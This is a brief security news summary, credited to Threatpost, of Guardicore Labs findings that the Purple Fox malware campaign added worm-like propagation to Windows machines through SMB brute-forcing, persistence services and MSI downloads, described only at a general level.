"Purple Fox Malware Targets Windows Machines With New Worm Capabilities"

Researchers at Guardicore Labs have discovered that a malware that has historically targeted exposed Windows machines through phishing and exploit kits has been retooled to add new “worm” capabilities.  Purple Fox, which first appeared in 2018, is an active malware campaign that until recently required user interaction or some kind of third-party tool to infect Windows machines. The adversaries have now upped their game and added new functionality that can brute force its way into victims’ systems on its own.  Researchers analyzed Purple Fox’s latest activity and found two significant changes to how attackers are propagating malware on Windows machines. The first is that the new worm payload executes after a victim machine is compromised through a vulnerable exposed service (such as SMB).  Purple Fox also is using a previous tactic to infect machines with malware through a phishing campaign, sending the payload via email to exploit a browser vulnerability, researchers observed.  Once the worm infects a victim’s machine, it creates a new service to establish persistence and execute a simple command that can iterate through several URLs that include the MSI for installing Purple Fox on a compromised machine.  

Threatpost reports: "Purple Fox Malware Targets Windows Machines With New Worm Capabilities"